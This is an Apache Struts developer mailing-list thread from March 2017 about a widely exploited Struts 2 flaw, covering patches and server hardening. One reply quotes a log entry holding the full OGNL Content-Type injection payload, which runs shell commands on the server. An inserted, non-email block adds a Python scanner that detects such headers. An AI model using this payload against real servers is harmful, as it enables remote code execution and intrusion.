Posted to dev@struts.apache.org by Dave Newton <da...@gmail.com> on 2017/03/09 14:45:08 UTC

S2 makes Hacker News :/

https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites

-- 
e: davelnewton@gmail.com
m: 908-380-8699
s: davelnewton_skype
t: @dave_newton <https://twitter.com/dave_newton>
b: Bucky Bits <http://buckybits.blogspot.com/>
g: davelnewton <https://github.com/davelnewton>
so: Dave Newton <http://stackoverflow.com/users/438992/dave-newton>

Re: S2 makes Hacker News :/

Posted by Doug Erickson <er...@part.net>.

> On Mar 14, 2017, at 12:17 PM, Lukasz Lenart <lu...@apache.org> wrote:
> 
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
>> What is the proper server setup to prevent this?
> 
> Upgrade to the latest Struts version ... and run the server on a dedicated
> account, block access to the world (the server should only be allowed to
> connect to localhost) and a few other things
> 
> 
> Regards
> -- 
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
> 



Re: S2 makes Hacker News :/

Posted by Greg Huber <gr...@gmail.com>.
Looking at my logs I can see some activity. GRRR:

179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action
HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"


2017-03-24 08:39:13,649 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException:
the request doesn't contain a multipart/form-data or multipart/mixed
stream, content type header is %{(#nike='multipart/form-data'
).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_
memberAccess?(#_memberAccess=#dm):((#container=#context['
com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.
getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.
getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#
iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/
c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#
cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@
org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@
org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.
flush())}

On 16 March 2017 at 12:45, Martin Gainty <mg...@hotmail.com> wrote:

>
>
>
>
> ________________________________
> From: Greg Huber <gr...@gmail.com>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using S2 does not necessarily mean you are affected;
> all I get is a response:
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs, this fishing is going on all the time.
>
> MG>From what I read, injections only happen with Content-Type injection.
>
> MG>Then again, patches, Struts 2.3.32 or 2.5.10.1, have been available for
> some time.
>
> MG>Johannes suggests implementing 'snort' to detect the injection
> vulnerability; reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
>
>
>
> On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run the server on a dedicated
> > account, block access to the world (the server should only be allowed to
> > connect to localhost) and a few other things
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
>
>
>
> >
> >
> >
>

Re: S2 makes Hacker News :/

Posted by Martin Gainty <mg...@hotmail.com>.



________________________________
From: Greg Huber <gr...@gmail.com>
Sent: Thursday, March 16, 2017 5:19 AM
To: Struts Developers List
Subject: Re: S2 makes Hacker News :/

Just because you are using S2 does not necessarily mean you are affected;
all I get is a response:

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs, this fishing is going on all the time.

MG>From what I read, injections only happen with Content-Type injection.

MG>Then again, patches, Struts 2.3.32 or 2.5.10.1, have been available for some time.

MG>Johannes suggests implementing 'snort' to detect the injection vulnerability; reference link at sans.edu below:
https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/

MG>Thanks Lukasz!

Thanks also Lukasz for the quick fix.

Cheers Greg




On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:

> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run the server on a dedicated
> account, block access to the world (the server should only be allowed to
> connect to localhost) and a few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/



>
>
>
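The WARN entry Greg quotes shows JakartaMultiPartRequest logging the rejected Content-Type value verbatim, and Martin points to Snort for detection. As an added example, not from this thread or the Struts project, the Python scanner below runs the same idea over constructed log lines: it flags a Content-Type carrying an OGNL expression marker and, more generally, any value that does not even parse as a media type. The function and constant names and the sample lines are my own.

```python
import re
from typing import List, Optional, Tuple

# Legitimate Content-Type: type/subtype plus optional ";name=value" parameters
# (quoted or bare token). Anything outside this grammar is not a media type at all.
MEDIA_TYPE_RE = re.compile(
    r'^\s*[\w.+-]+/[\w.+-]+\s*(;\s*[\w.-]+=("[^"]*"|[^;\s]+)\s*)*$')
# Marker of an OGNL expression in a header, as in the S2-045 Content-Type attack.
OGNL_OPEN_RE = re.compile(r'[%$]\{')
# JakartaMultiPartRequest's WARN line (quoted in the thread) repeats the offending
# header after this phrase; a raw HTTP header line is the other supported input.
STRUTS_WARN_RE = re.compile(r'content type header is (.*)$', re.IGNORECASE)
RAW_HEADER_RE = re.compile(r'^\s*content-type\s*:\s*(.*)$', re.IGNORECASE)

def classify_content_type(value: str) -> str:
    """Return 'ok', 'ognl_expression' or 'malformed' for one Content-Type value."""
    if OGNL_OPEN_RE.search(value):
        return 'ognl_expression'
    if not MEDIA_TYPE_RE.match(value):
        return 'malformed'
    return 'ok'

def extract_content_type(line: str) -> Optional[str]:
    """Pull the Content-Type value out of a Struts WARN line or a raw header line."""
    m = STRUTS_WARN_RE.search(line) or RAW_HEADER_RE.match(line)
    return m.group(1).strip() if m else None

def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, verdict, value) for every suspicious Content-Type."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = extract_content_type(line)
        if value is not None:
            verdict = classify_content_type(value)
            if verdict != 'ok':
                hits.append((n, verdict, value))
    return hits

# Constructed sample lines (hypothetical, not from the thread); line 3 mimics the
# Struts WARN entry with a harmless placeholder expression in place of a payload.
SAMPLE_LOG = [
    'Content-Type: multipart/form-data; boundary=----ConstructedBoundary123',
    'Content-Type: text/html; charset="utf-8"',
    '2017-03-24 08:39:13,649 WARN JakartaMultiPartRequest:parse - Request exceeded '
    "size limit! ... content type header is %{(#x='multipart/form-data').(#y=1)}",
    'Content-Type: ${#probe}',
    'Content-Type: multipart/form-data boundary',
]
```

Run against the real JakartaMultiPartRequest WARN lines, the "malformed" verdict also catches probes that avoid the `%{` marker but still send something that is not a media type.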

Re: S2 makes Hacker News :/

Posted by Greg Huber <gr...@gmail.com>.
Just because you are using S2 does not necessarily mean you are affected;
all I get is a response:

HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close

Looking at my logs, this fishing is going on all the time.

Thanks also Lukasz for the quick fix.

Cheers Greg




On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:

> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run the server on a dedicated
> account, block access to the world (the server should only be allowed to
> connect to localhost) and a few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
>
>

Re: S2 makes Hacker News :/

Posted by Lukasz Lenart <lu...@apache.org>.
2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> What is the proper server setup to prevent this?

Upgrade to the latest Struts version ... and run the server on a dedicated
account, block access to the world (the server should only be allowed to
connect to localhost) and a few other things


Regards
-- 
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/



Re: S2 makes Hacker News :/

Posted by Doug Erickson <er...@part.net>.
What is the proper server setup to prevent this?

> On Mar 14, 2017, at 7:08 AM, Louis Smith <dr...@gmail.com> wrote:
> 
> Sad, but what should have been the story is how rapidly the fixes were made
> available, and how a properly set up server would not be vulnerable.
> 
> Louis
> 
> 
>> On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <rg...@apache.org> wrote:
>> 
>> More of that...
>> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>> 
>>> On 09.03.17 at 16:04, Lukasz Lenart wrote:
>>> 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
>>>> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
>>> 
>>> Yeah... this is sad news, even if we tried our best to keep this
>>> confidential ...
>>> 
>>> 
>>> Regards
>>> 
>> 
>> --
>> René Gielen
>> http://twitter.com/rgielen
>> 
>> 
>> 



Re: S2 makes Hacker News :/

Posted by Louis Smith <dr...@gmail.com>.
Sad, but what should have been the story is how rapidly the fixes were made
available, and how a properly set up server would not be vulnerable.

Louis


On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <rg...@apache.org> wrote:

> More of that...
> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>
> On 09.03.17 at 16:04, Lukasz Lenart wrote:
> > 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
> >> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
> >
> > Yeah... this is sad news, even if we tried our best to keep this
> > confidential ...
> >
> >
> > Regards
> >
>
> --
> René Gielen
> http://twitter.com/rgielen
>
>
>

Re: S2 makes Hacker News :/

Posted by Rene Gielen <rg...@apache.org>.
More of that...
http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC

On 09.03.17 at 16:04, Lukasz Lenart wrote:
> 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
>> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
> 
> Yeah... this is sad news, even if we tried our best to keep this
> confidential ...
> 
> 
> Regards
> 

-- 
René Gielen
http://twitter.com/rgielen



Re: S2 makes Hacker News :/

Posted by Lukasz Lenart <lu...@apache.org>.
2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites

Yeah... this is sad news, even if we tried our best to keep this
confidential ...


Regards
-- 
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
